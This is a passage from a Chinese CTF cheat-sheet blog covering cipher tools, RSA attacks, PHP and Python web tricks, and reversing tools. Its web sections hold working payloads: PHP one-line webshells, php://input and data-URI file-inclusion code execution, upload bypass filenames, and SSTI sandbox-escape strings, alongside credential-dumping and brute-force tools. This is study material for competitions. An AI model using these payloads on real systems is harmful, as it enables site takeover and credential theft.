[精灵语](https://www.sohu.com/a/163576192_556712)(沙拉堤文字(Sarati)、腾格瓦文字(Tengwar)、色斯文(Cirth))</code>列置换-将密文分为N列<code>`Playfair</code>(是一种使用一个关键词方格来加密字符对的加密法)<a href="http://hebin.me/2017/09/07/%e8%a5%bf%e6%99%aectf-play/" target="_blank" rel="external">案例</a><br><a href="https://wenku.baidu.com/view/80432203700abb68a882fb44.html" target="_blank" rel="external">盲文字母对照表</a><br><a href="http://www.practicalcryptography.com/ciphers/hill-cipher/" target="_blank" rel="external">希尔密码</a>(<a href="https://planetcalc.com/3327/)(注意对照表可能不同,在线解密不一定对，[案例](https://blog.csdn.net/dongyanwen6036/article/details/76358824" target="_blank" rel="external">https://planetcalc.com/3327/)(注意对照表可能不同,在线解密不一定对，[案例](https://blog.csdn.net/dongyanwen6036/article/details/76358824</a>))<br><a href="http://www.yunsuanzi.com/matrixcomputations/solvematrixinverse.html" target="_blank" rel="external">矩阵求逆</a><br><a href="http://www.atool.org/quality_factor.php" target="_blank" rel="external">分解质因数</a>(<a href="http://factordb.com/)`msieve`,`yafu-x64.exe;factor(n)`" target="_blank" rel="external">http://factordb.com/)`msieve`,`yafu-x64.exe;factor(n)`</a><br><a href="http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/" target="_blank" rel="external">彩虹表下载</a>,指令<code>rcracki_mt.exe -h 9e94258a03356914 D:\Downloads\rainbow</code><br><a href="http://www.zhaoyuanma.com/aspdecode.php" target="_blank" rel="external">ASP/VBScript/JScript.Encode 在线解密</a>(<a href="http://adophper.com/encode.html" target="_blank" rel="external">http://adophper.com/encode.html</a>)<br><a href="http://www.qqxiuzi.cn/bianma/base.php" target="_blank" rel="external">Base64/Base32/Base16</a><br><code>WinDecrypto</code>(<a href="http://www.softpedia.com/get/Others/Home-Education/Decrypto.shtml#download)(不能安装直接解压)[quipqiup词频分析](https://quipqiup.com/" target="_blank" rel="external">http://www.softpedia.com/get/Others/Home-Education/Decrypto.shtml#download)(不能安装直接解压)[quipqiup词频分析](https://quipqiup.com/</a>)<br><code>hashcat</code>(<a href="https://blog.werner.wiki/use-hashcat-crack-all-kinds-of-hash/)(https://blog.werner.wiki/hashcat-attack-modes/)(https://hashcat.net/wiki/doku.php?id=hashcat)各种离线hash破解" target="_blank" rel="external">https://blog.werner.wiki/use-hashcat-crack-all-kinds-of-hash/)(https://blog.werner.wiki/hashcat-attack-modes/)(https://hashcat.net/wiki/doku.php?id=hashcat)各种离线hash破解</a><br><code>hydra</code>(<a href="https://blog.werner.wiki/online-brute-force-tool-Hydra/)在线服务破解" target="_blank" rel="external">https://blog.werner.wiki/online-brute-force-tool-Hydra/)在线服务破解</a><br><a href="https://blog.werner.wiki/ophcrack-ntlm/" target="_blank" rel="external">Ophcrack</a>win密码破解-彩虹表<br><a href="https://blog.werner.wiki/use-mimikatz-get-win7-plain-passwd/" target="_blank" rel="external">mimikatz</a>获取Win7明文登录密码<br><a href="https://blog.werner.wiki/use-mimipenguin-get-linux-plain-passwd/" target="_blank" rel="external">mimipenguin</a>从内存中获取linux明文登录密码-需root<br><a href="https://github.com/quarkslab/quarkspwdump" target="_blank" rel="external">QuarksPwDump</a>抓取Windows HASH<br><a href="https://baike.baidu.com/item/标准银河字母" target="_blank" rel="external">标准银河字母</a><br><code>埃特巴什码</code>是一种以字母倒序排列作为特殊密钥的替换加密,即将<code>ABCDEFGHIJKLMNOPQRSTUVWXYZ</code>替换成<code>ZYXWVUTSRQPONMLKJIHGFEDCBA</code><br><code>Maya 数字</code>(<a href="https://baike.baidu.com/item/玛雅数字/1931332" target="_blank" rel="external">https://baike.baidu.com/item/玛雅数字/1931332</a>)<br><a href="http://www.jsfuck.com/" target="_blank" rel="external">jsfuck</a>使用<code>()+[]!</code>等六个字符编码js代码,<a href="http://tmxk.org/jother/" target="_blank" rel="external">jother</a>使用<code>()[]{}!+</code>8个字符编码js代码<br><a href="https://pypi.org/project/bubblepy/1.0/" target="_blank" rel="external">Bubble Babble Encoding</a><code>Pineapple</code>-&gt;<code>xigak-nyryk-humil-bosek-sonax</code><br><code>Quoted-Printable编码</code>(<a href="http://www.mxcz.net/tools/quotedprintable.aspx)样式`=E4=B8=89=E5=B8`" target="_blank" rel="external">http://www.mxcz.net/tools/quotedprintable.aspx)样式`=E4=B8=89=E5=B8`</a><br><a href="https://www.cnblogs.com/android-html5/archive/2011/02/09/2533784.html" target="_blank" rel="external">jjencode/aaencode-js,rrencode-Ruby,ppencode-Perl</a>使用符号/颜文字编码,<a href="http://www.120muban.com/tools/jjencode/" target="_blank" rel="external">jjencode</a>(<a href="http://utf-8.jp/public/jjencode.html),[aaencode](http://utf-8.jp/public/aaencode.html" target="_blank" rel="external">http://utf-8.jp/public/jjencode.html),[aaencode](http://utf-8.jp/public/aaencode.html</a>)<br><code>xxencode``uuencode</code>(<a href="http://web.chacuo.net/charsetxxencode/" target="_blank" rel="external">http://web.chacuo.net/charsetxxencode/</a>)<br><a href="https://introspelliam.github.io/2017/11/12/misc/CTF比赛中关于javascript的总结/" target="_blank" rel="external">CTF比赛中关于javascript的总结</a></p>
<h4 id="字母频率"><a href="#字母频率" class="headerlink" title="字母频率"></a>字母频率</h4><table>
<thead>
<tr>
<th>A</th>
<th>B</th>
<th>C</th>
<th>D</th>
<th>E</th>
<th>F</th>
<th>G</th>
<th>H</th>
<th>I</th>
<th>J</th>
<th>K</th>
<th>L</th>
<th>M</th>
<th>N</th>
<th>O</th>
<th>P</th>
<th>Q</th>
<th>R</th>
<th>S</th>
<th>T</th>
<th>U</th>
<th>V</th>
<th>W</th>
<th>X</th>
<th>Y</th>
<th>Z</th>
</tr>
</thead>
<tbody>
<tr>
<td>8.19</td>
<td>1.47</td>
<td>3.83</td>
<td>3.91</td>
<td>12.25</td>
<td>2.26</td>
<td>1.71</td>
<td>4.57</td>
<td>7.10</td>
<td>0.14</td>
<td>0.41</td>
<td>3.77</td>
<td>3.34</td>
<td>7.06</td>
<td>7.26</td>
<td>2.89</td>
<td>0.09</td>
<td>6.85</td>
<td>6.36</td>
<td>9.41</td>
<td>2.58</td>
<td>1.09</td>
<td>1.59</td>
<td>0.21</td>
<td>1.58</td>
<td>0.08</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>E</th>
<th>T</th>
<th>A</th>
<th>O</th>
<th>I</th>
<th>N</th>
<th>R</th>
<th>S</th>
<th>H</th>
<th>D</th>
<th>C</th>
<th>L</th>
<th>M</th>
<th>P</th>
<th>U</th>
<th>F</th>
<th>G</th>
<th>W</th>
<th>Y</th>
<th>B</th>
<th>V</th>
<th>K</th>
<th>X</th>
<th>J</th>
<th>Q</th>
<th>Z</th>
</tr>
</thead>
<tbody>
<tr>
<td>12.25</td>
<td>9.41</td>
<td>8.19</td>
<td>7.26</td>
<td>7.10</td>
<td>7.06</td>
<td>6.85</td>
<td>6.36</td>
<td>4.57</td>
<td>3.91</td>
<td>3.83</td>
<td>3.77</td>
<td>3.34</td>
<td>2.89</td>
<td>2.58</td>
<td>2.26</td>
<td>1.71</td>
<td>1.59</td>
<td>1.58</td>
<td>1.47</td>
<td>1.09</td>
<td>0.41</td>
<td>0.21</td>
<td>0.14</td>
<td>0.09</td>
<td>0.08</td>
</tr>
</tbody>
</table>
<h4 id="技巧"><a href="#技巧" class="headerlink" title="技巧"></a>技巧</h4><ul>
<li><code>PHP-srand</code>生成php随机数种子，不同版本不通用</li>
<li>ZIP明文攻击:拥有压缩包中的一个文件，将其压缩后使用ARCHPR明文攻击  </li>
<li><code>U2Fsd</code>AES加密特征</li>
</ul>
<h4 id="RSA"><a href="#RSA" class="headerlink" title="RSA"></a>RSA</h4><ul>
<li><a href="https://xz.aliyun.com/t/2446" target="_blank" rel="external">CTF中常见的RSA相关问题总结</a></li>
<li><a href="https://www.anquanke.com/post/id/84632" target="_blank" rel="external">CTF中RSA的常见攻击方法</a>  </li>
<li><a href="http://www.ruanyifeng.com/blog/2013/07/rsa_algorithm_part_two.html" target="_blank" rel="external">文章-RSA算法原理</a></li>
<li><a href="http://www.guideep.com/read?guide=5676830073815040" target="_blank" rel="external">RSA 算法详解</a></li>
<li><a href="https://www.anquanke.com/post/id/158944" target="_blank" rel="external">浅析RSA Padding Attack</a></li>
<li>n=p<em>q,p/q均为质数;`phi = (p-1) </em> (q-1)<code>,e/phi互质,即gcd(phi,e)==1,且</code>1&lt;e&lt;phi<code>;加密</code>c = (m ^ e) % n<code>,解密</code>m = (c ^ d) % n`,其中m为明文，c为密文，(n,e)为公钥对，d为私钥，要求 0 &lt;= m &lt; n 。</li>
<li>直接分解N<ul>
<li>一般n的长度小于等于512bit，可直接在线分解质因数</li>
<li>利用公约数:如果在两次公钥的加密过程中使用的$n_1$ 和$n_2$具有相同的素因子，那么可以利用欧几里得算法直接将$n_1$和$n_2$分解。</li>
<li>在p，q的取值差异过大，或者p，q的取值过于相近的时候，Format方法与Pollard rho方法都可以很快将n分解成功.<a href="https://sourceforge.net/projects/yafu/" target="_blank" rel="external">yahu</a><code>yafu-x64.exe;factor(n)</code>;<code>yafu gcd(@) -batchfile c:\Users\zengjia\Desktop\test.txt</code>(n过长时使用，最后需要换行，使用后文件消失)</li>
<li>n和c可能存在公约数<code>yafu-x64.exe;gcd(n,c)</code></li>
<li><a href="https://sourceforge.net/projects/msieve" target="_blank" rel="external">msieve</a><code>C:\software\msieve153\msieve153.exe n -q</code>(0开头代表8进制，0x开头代表16进制，否则为10进制，-q不记录日志中而是输出到屏幕上)</li>
</ul>
</li>
<li><code>低加密指数攻击</code><ul>
<li>e=3时的小明文攻击:当e=3时，如果明文过小，导致明文的三次方仍然小于n，那么通过直接对密文三次开方，即可得到明文。</li>
<li><code>低加密指数广播攻击</code>:如果选取的加密指数较低，并且使用了相同的加密指数给一个接受者的群发送相同的信息，那么可以进行广播攻击得到明文。</li>
<li>Coppersmith定理攻击:Coppersmith定理指出在一个e阶的mod n多项式f(x)中，如果有一个根小于$ n^frac{1}{e} $，就可以运用一个O(log n)的算法求出这些根。</li>
</ul>
</li>
<li><code>低解密指数攻击</code>:e过大或过小，可使用<a href="https://github.com/pablocelayes/rsa-wiener-attack" target="_blank" rel="external">rsa-wiener-attack</a>解出私钥</li>
<li><a href="http://www.bystudent.com/?p=236" target="_blank" rel="external">共模攻击</a>:如果在RSA的使用中使用了相同的模n对相同的明文m进行了加密，那么就可以在不分解n的情况下还原出明文m的值。</li>
<li>其他(<a href="http://hebin.me/2017/09/07/西普ctf-rsangasis-ctf-2013/" target="_blank" rel="external">http://hebin.me/2017/09/07/西普ctf-rsangasis-ctf-2013/</a>)</li>
<li>openssl分析公钥得到(n,e)<code>openssl rsa -pubin -text -modulus -in public.pem</code>,(<a href="http://tool.chacuo.net/cryptrsakeyparse" target="_blank" rel="external">http://tool.chacuo.net/cryptrsakeyparse</a>)</li>
<li>openssl使用密钥进行解密<code>openssl rsautl -decrypt -in flag.enc -inkey private.pem</code></li>
<li><code>Rabin加密中的N可被分解</code>(n==2)</li>
<li><a href="https://www.40huo.cn/blog/rsa-private-key-recovery-and-oaep.html" target="_blank" rel="external">RSA 私钥恢复和最优非对称加密填充</a></li>
<li><code>LSB Oracle Attack</code>(可以选择密文并泄露最低位)</li>
<li><code>选择密文攻击</code>(可以构造任意密文并获得对应明文)</li>
<li><a href="https://www.tanglei.name/blog/rsa-and-timing-attack.html" target="_blank" rel="external">RSA Timing Attack-计时攻击</a>(根据耗时判断)是边信道攻击(或称”侧信道攻击”, Side Channel Attack, 简称SCA)的一种</li>
<li>RSA约束条件:<code>1&lt;e|d&lt;phi</code>;<code>p,q为互不相等的质数</code>;<code>gcd(e , phi) == 1</code>;<code>0 &lt;= m &lt; n</code>;<code>(e * d)% n ==1</code>;<code>;</code>;``;</li>
</ul>
<h4 id="数论"><a href="#数论" class="headerlink" title="数论"></a>数论</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div></pre></td><td class="code"><pre><div class="line">(a + b) % n ≡ (a % n + b % n) % n //四则运算</div><div class="line">(a - b) % n ≡ (a % n - b % n) % n</div><div class="line">(a * b) % n ≡ (a % n * b % n) % n</div><div class="line">(a ^ b) % n ≡ ((a % n) ^ b) % n //幂运算</div><div class="line">((a + b) % p + c) % p = (a + (b + c) % p) % p //结合律</div><div class="line">((a * b) % p * c) % p = (a * (b * c) % p) % p</div><div class="line">(a + b) % p = (b + a) % p //交换律</div><div class="line">(a * b) % p = (b * a) % p</div><div class="line">(a+b) % p = ( a % p + b % p ) % p //分配律</div><div class="line">((a +b)% p * c) % p = ((a * c) % p + (b * c) % p) % p</div><div class="line"></div><div class="line">如果 a ≡ b (mod m) 且有 c ≡ d (mod m):</div><div class="line">​a+c≡b+d (mod m)</div><div class="line">​a−c≡b−d (mod m)</div><div class="line">​a×c≡b×d (mod m)</div><div class="line"></div><div class="line">若 a ≡ b(mod n) ,则</div><div class="line">1.对于任意正整数c,有a^c ≡ b^c(mod n)</div><div class="line">2.对于任意整数c,有ac ≡ bc(mod n),a+c ≡ b+c(mod n),</div><div class="line">3.若 c ≡ d(mod n),则a-c ≡ b-d(mod n),a+c ≡ b+d(mod n),ac ≡ bd(mod n)</div><div class="line"></div><div class="line">如果ac≡bc (mod m)，且c和m互质，则a≡b (mod m）。</div><div class="line">[理解：当且仅当c和m互质,c^-1存在,等式左右可同乘模逆。]</div><div class="line"></div><div class="line">除法规则：</div><div class="line">在模n意义下，a/b不再仅仅代表这两个数相除，而是指 a+k1*n 和 b+k2*n这两个组数中任意两个相除，使商为整数</div><div class="line">因此也就可以理解，除以一个数等价于乘以它的逆</div><div class="line">a/b ≡ c(mod n) &lt;=&gt; a ≡ c*(b^-1) (mod n)，其中b模n的逆记作b的负一次方。</div><div class="line"></div><div class="line">欧拉定理:</div><div class="line">若 n,a 为正整数，且 n,a 互素，则：a^phi(n) ≡ 1 (mod n);phi(n)可通过欧拉函数计算，如果n=q*p且q、p互质，phi(n)=(p-1)(q-1)</div><div class="line"></div><div class="line">费马小定理:</div><div class="line">a是整数,p是质数,则a^p≡a(mod p),如果a不是p的倍数,还有a^(p-1) ≡ 1(mod p) </div><div class="line"></div><div class="line">中国剩余定理:</div><div class="line">若x mod n1 = c1 and x mod n2 = c2 and x mod n3 = c3 且ni互质;可根据公司求得x</div><div class="line">​​</div><div class="line">c^d mod n = c^d mod p if m &lt; p</div><div class="line">pow(p, q, p*q) = p; pow(q, p, p*q)=q;</div></pre></td></tr></table></figure>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h4 id="常用-1"><a href="#常用-1" class="headerlink" title="常用"></a>常用</h4><p><code>.git</code>目录泄漏,可利用<code>http://wutongyu.info/about-git-config-file-exp/</code>下载网站所有文件,也可以用<code>https://github.com/lijiejie/GitHack</code>(python GitHack.py <a href="http://***//.git" target="_blank" rel="external">http://***//.git</a>)<br><code>.DS_Store</code>文件泄漏<code>http://www.am0s.com/.DS_Store</code>，<a href="https://github.com/lijiejie/ds_store_exp" target="_blank" rel="external">ds_store_exp</a><code>python ds_store_exp.py http://101.71.29.5:10000/.DS_Store</code><br>网站备份压缩文件<code>.txt</code>,<code>.bak</code>,<code>.xxx.swp</code>,<code>.html</code>,<code>.rar</code>,<code>.zip</code>,<code>.7z</code>,<code>.tar.gz</code>,<code>xxx~</code><br>默认/测试文件<code>phpinfo.php</code>,<code>test.php</code>,<code>phpMyAdmin</code>,<code>404.html</code><br>配置文件<code>config.php</code>,<code>web.config</code>,<code>conn.asp</code>,<code>db.php/asp</code>,<code>jdbc.properties</code>,<code>sysconfig.properties</code>,<code>JBOSS_HOME\docs\examples\jca\XXXX-ds.xml</code><br>SVN导致文件泄露<code>http://www.am0s.com/admin/scripts/fckeditor.266/editor/.svn/entries</code>,漏洞利用工具：<code>dvcs-ripper</code>,<code>rip-svn.pl -v -u http://www.am0s.com/.svn/</code><br>WEB-INF/web.xml泄露</p>
<pre><code>- /WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。
- /WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中
- /WEB-INF/lib/：存放web应用需要的各种JAR文件，放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
- /WEB-INF/src/：源码目录，按照包名结构放置各个java文件。
- /WEB-INF/database.properties：数据库配置文件
</code></pre><p>CVS泄漏:返回根信息<code>http://www.am0s.com/CVS/Root</code>,返回所有文件的结构<code>http://www.am0s.com/CVS/Entries</code>,下载<code>bk clone http://www.am0s.com/name dir</code><br>apache配置文件泄漏<code>.htaccess</code>,<code>httpd.conf</code><br><a href="https://blog.csdn.net/yanghuan313/article/details/65010925" target="_blank" rel="external">有关Python序列化和存在的反序列化缺陷思考</a><br><code>修改IP</code>:<code>X-Forwarded-For: 127.0.0.1</code></p>
<h4 id="上传漏洞"><a href="#上传漏洞" class="headerlink" title="上传漏洞"></a>上传漏洞</h4><p>0x00截断或%00<br>后缀名绕过(大小写，不常见后缀如php2, php3, php4, php5, phps, pht, phtm, phtml)<br>Content-Type：类型、大小写<br>HTTP参数污染(HPP)<br><figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;HTML&gt; &lt;% java.io.File file = new java.io.File("E:/software/WEB-goat/WEB-GOAT/WebGoat-5.4/tomcat/webapps/WebGoat/mfe_target/090654.txt"); file.createNewFile(); %&gt; &lt;/HTML&gt;</div></pre></td></tr></table></figure></p>
<h4 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h4><p><a href="https://www.jb51.net/article/75830.htm" target="_blank" rel="external">详解php比较操作符的安全问题</a><br><a href="https://hackfun.org/2018/01/09/CTF中常见PHP特性学习笔记/" target="_blank" rel="external">CTF中常见PHP特性学习笔记</a><br><a href="https://www.jianshu.com/p/723d24c1fa32" target="_blank" rel="external">CTF中常见的PHP知识点</a></p>
<p><code>strip_tags</code>剥去字符串中的 HTML、XML 以及 PHP 的标签.<br>本地包含:<code>file://</code>,<code>php://</code>协议.<code>show_source</code>函数.<br><code>GLOBALS</code>超全局数组,可以打印出所有变量.<br><code>php://input</code>:读取post数据。例-文件包含漏洞转变成代码执行的漏洞：源码<code>&lt;?php @include($_GET[&quot;file&quot;])?&gt;</code>，payload:url<code>http://*.*/fileinclude.php?file=php://input</code>,post<code>&lt;?php system(&#39;whoami&#39;);?&gt;</code><br><code>data URI schema</code>:<code>file=data:text/plain,&lt;?php system(&#39;cat /var/www/FileInclude.php&#39;)?&gt;</code>,base64编码<code>data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL3Zhci93d3cvRmlsZUluY2x1ZGUucGhwJyk/Pg==</code><br><code>php://filter/read=convert.base64-encode/resource=[文件路径]</code>:以base64编码的方式读取指定文件的内容.<br>    <a href="http://www.freebuf.com/articles/web/14097.html" target="_blank" rel="external">php://input，php://filter，data URI schema的那些事</a>，可以修改为<code>read=string.rot13</code>或尝试<code>zip</code>,<code>mcrypt</code>绕过限制<br>md5值相等，但是值不相等:<code>240610708</code>和<code>QNKCDZO</code>和<code>!1793422703!</code>和<code>aabg7XSs</code>和<code>aabC9RqS</code>.或利用md5无法处理数组<code>username[]=1&amp;password[]=2</code>,<code>sha</code>同.<br>!$_GET[‘id’]并且id==0：令id=%00或者令id=.都可以绕过<br>strlen($b)&gt;5 and eregi(“111”.substr($b,0,1),”1114”) and substr($b,0,1)!=4：可以利用%00截断，令b=%0012345 绕过。<br><code>serialize</code>和<code>unserialize</code>:序列化和反序列化，<a href="http://www.freebuf.com/articles/rookie/150129.html" target="_blank" rel="external">参考</a><br><code>print_r(scandir(&quot;./&quot;))</code>或<code>print_r(glob(&quot;*&quot;))</code>:当前目录文件列表<br><code>assert</code>和<code>eval</code>均会将字符串当PHP 代码执行，不过eval($assertion)只是执行符合php编码规范的$code_str。<br><code>strcmp</code>用于比较两个字符串是否相等，相等则返回0.当比较任意数组与字符串时也返回0，可构造参数<code>?v3[]=</code>绕过<br>一句话木马<code>&lt;?php @eval($_POST[&quot;cmd&quot;])?&gt;</code>,<code>&lt;?php @system($_POST[&quot;cmd&quot;])?&gt;</code>,<code>&lt;?=eval($_POST[&#39;cmd&#39;]);&gt;</code>,<code>www.bugku.com/tools/phpyijuhua.txt</code><br><code>&lt;script language=php&gt;system(&quot;ls&quot;)&lt;/script&gt;</code>列当前目录<br>上传绕过<code>1.php;.jpg</code>,<code>1.php%00.jpg</code>;<code>1.php.php</code><br><code>session.upload_progress.enabled</code>这个参数在php.ini默认开启,如果不是Off,就会在上传的过程中生成上传进度文件,参考writeup(<a href="https://xz.aliyun.com/t/2148)(http://bendawang.site/2018/03/13/N1CTF-2018-Web-writeup/)[Session" target="_blank" rel="external">https://xz.aliyun.com/t/2148)(http://bendawang.site/2018/03/13/N1CTF-2018-Web-writeup/)[Session</a> 上传进度文档](<a href="http://php.net/manual/zh/session.upload-progress.php" target="_blank" rel="external">http://php.net/manual/zh/session.upload-progress.php</a>)<br><code>xdebug</code>PHP的调试工具可getshell，参数<code>remote_connect_back</code>,参考同上,<a href="https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface" target="_blank" rel="external">Xdebug: A Tiny Attack Surface</a><br><code>is_numeric</code>判断是否是数字，可以用<code>%00</code>绕过<br><code>intval</code>是有最大取值范围的，超过了会还原最大值。32位系统是2^31+1即2147483647<br>字符串与bool类型的<code>true</code>相等，字符串<code>a</code>和int类型<code>0</code>相等<br><code>md5</code>和<code>0</code>比较,只需要找到<code>md5</code>值为<code>0exxx</code>(xxx全为数字,共30位的),如<code>s878926199a</code><br><code>int</code>和<code>intval</code>在转换数字都是向下的，如<code>0.99</code>会被转为<code>0</code>,<code>1.1</code>会被转为<code>1</code><br>数字大小及长度限制时可用科学计数法绕过<code>(strlen($_GET[&#39;password&#39;]) &lt; 8 &amp;&amp; $_GET[&#39;password&#39;] &gt; 9999999)</code>可使用<code>9e7</code><br>变量覆盖<code>id=a[0]=240610708</code><br>读取文件<code>file(&quot;flag.php&quot;)</code>,<code>echo cat flag.php;</code>,<code>file_get_contents(&#39;flag.php&#39;)</code>,<code>show_source(&#39;flag.php&#39;)</code><br>md5相等<code>if((string)$_POST[&#39;param1&#39;]!==(string)$_POST[&#39;param2&#39;] &amp;&amp; md5($_POST[&#39;param1&#39;])===md5($_POST[&#39;param2&#39;])):
``Param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2</code>,16进制<code>4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2</code><br><code>Param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2</code>,16进制<code>4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2</code><br><a href="https://mp.weixin.qq.com/s/TaoivKpgzyg8HZGsUdeytQ" target="_blank" rel="external">php 不用字母，数字和下划线写 shell</a><br><a href="https://www.anquanke.com/post/id/154284" target="_blank" rel="external">CTF题目思考–极限利用</a>,shell /???/??? /bin/cat<br><code>$_GET</code>自动替换<code>.</code>或<code>+</code>为<code>_</code><br>数组与整数比较时，数组永远更大<br><a href="https://introspelliam.github.io/2017/08/27/web/php伪协议/" target="_blank" rel="external">php伪协议</a></p>
<h4 id="python"><a href="#python" class="headerlink" title="python"></a>python</h4><p><a href="http://foreversong.cn/archives/1201" target="_blank" rel="external">Python沙箱逃逸payload总结</a><br>读文件:<code>{{().__class__.__bases__[0].__subclasses__()[40]('flag').read()}}</code><br>命令执行1:<code>{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].__dict__['popen']('cat flag*').read()}}</code><br>命令执行2:<code>{{().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("cat flag*").read()')}}</code><br>waf绕过:<code>{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&amp;b=__mro__&amp;c=__subclasses__&amp;d=read</code><br><a href="https://github.com/OAlienO/CTF/tree/master/2018/noxCTF/Smooth-snake" target="_blank" rel="external">python沙箱环境过滤._及关键字</a><br><a href="https://ctftime.org/writeup/10851" target="_blank" rel="external">python模版注入过滤config/self/圆括号</a><br><a href="https://rawsec.ml/en/noxCTF-2018-write-ups/#634-python-for-fun-2-misc" target="_blank" rel="external">python3沙箱逃逸</a></p>
<h4 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h4><ul>
<li><a href="https://www.wappalyzer.com/download" target="_blank" rel="external">wappalyzer</a>网站架构识别插件，通过该插件能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数.</li>
<li><code>canvas截图</code>项目地址:<code>https://github.com/Lz1y/frame2canvas</code></li>
<li>中国菜刀</li>
<li><a href="https://github.com/antoor/antSword" target="_blank" rel="external">中国蚁剑</a></li>
<li><a href="http://qqhack8.blog.163.com/blog/static/1141479852013944524118/" target="_blank" rel="external">K8一句话密码爆破工具{秒破10万}</a></li>
<li>phpMyAdmin多线程批量破解工具</li>
<li>(XXEinjector – XXE自动化测试工具](<a href="https://blog.csdn.net/qq_27446553/article/details/50679145" target="_blank" rel="external">https://blog.csdn.net/qq_27446553/article/details/50679145</a>)</li>
<li>fuzz字典:<a href="http://fuzz.hi0x0.com/" target="_blank" rel="external">hi0x0.com 的FUZZ军火库</a>,<a href="https://github.com/fuzzdb-project/fuzzdb" target="_blank" rel="external">fuzzdb</a></li>
<li><a href="https://github.com/brendan-rius/c-jwt-cracker" target="_blank" rel="external">c-jwt-cracker</a>爆破JWT的secret key</li>
</ul>
<h4 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h4><ul>
<li><code>swp</code>或<code>bak</code>或<code>.DS_Store</code>备份文件</li>
<li>SSRF-服务器端请求伪造</li>
<li>SSTI-服务端模板注入(<a href="https://www.cnblogs.com/tyomcat/p/5440488.html),过滤可用`cookies`或`args`绕过" target="_blank" rel="external">https://www.cnblogs.com/tyomcat/p/5440488.html),过滤可用`cookies`或`args`绕过</a></li>
<li>关闭chrome的xss过滤器<code>--args --disable-xss-auditor</code></li>
<li><a href="https://rawsec.ml/en/noxCTF-2018-write-ups/#902-dictionary-of-obscure-sorrows-web" target="_blank" rel="external">LDAP注入</a>,格式<code>http://54.152.220.222/word.php?page=b*</code></li>
</ul>
<h2 id="逆向"><a href="#逆向" class="headerlink" title="逆向"></a>逆向</h2><h4 id="工具-1"><a href="#工具-1" class="headerlink" title="工具"></a>工具</h4><p><code>ida</code>逆向分析工具-静态分析;<code>PEiD</code>壳分析工具;<code>Winhex</code>二进制查看修改;<code>Ollydbg</code>逆向分析工具-动态调试;<code>Android Killer</code>安卓反编译;<code>Roeder’s .NET Reflector</code>.NET Framework反编译<br>拿到题第一步先分析是否加壳<br><a href="http://tool.lu/pyc/" target="_blank" rel="external">pyc反编译</a>,<a href="https://sourceforge.net/projects/easypythondecompiler/" target="_blank" rel="external">EasyPythonDecompiler</a>,(<a href="http://tools.bugscaner.com/decompyle/)(https://github.com/rocky/python-uncompyle6" target="_blank" rel="external">http://tools.bugscaner.com/decompyle/)(https://github.com/rocky/python-uncompyle6</a>)<br><code>JD-GUI</code>Java反编译工具<br><code>ILSpy</code> 是一个开源的.NET反编译工具<br><code>Action Script Viewer</code>SWF(Flash)反编译软件<br><code>W32Dasm</code>静态反汇编工具<br><code>angr</code>:约束求解器<br><code>Cheat Engine</code>内存修改编辑工具</p>
<h4 id="文章"><a href="#文章" class="headerlink" title="文章"></a>文章</h4><p><a href="https://introspelliam.github.io/2017/07/06/code/汇编中常见指令解释/" target="_blank" rel="external">汇编中常见指令解释</a></p>
<h4 id="技巧-1"><a href="#技巧-1" class="headerlink" title="技巧"></a>技巧</h4><ul>
<li>拿到题第一步先分析是否加壳<code>PEiD</code></li>
<li><code>00401000</code>程序起始地址</li>
</ul>
<h4 id="安卓"><a href="#安卓" class="headerlink" title="安卓"></a>安卓</h4><p>工具:<code>apktool</code>,<code>dextojar</code>,<code>jd-gui</code>,<code>jeb</code>,<code>android killer</code>,<a href="http://www.javadecompilers.com/apk" target="_blank" rel="external">apk在线反编译</a></p>
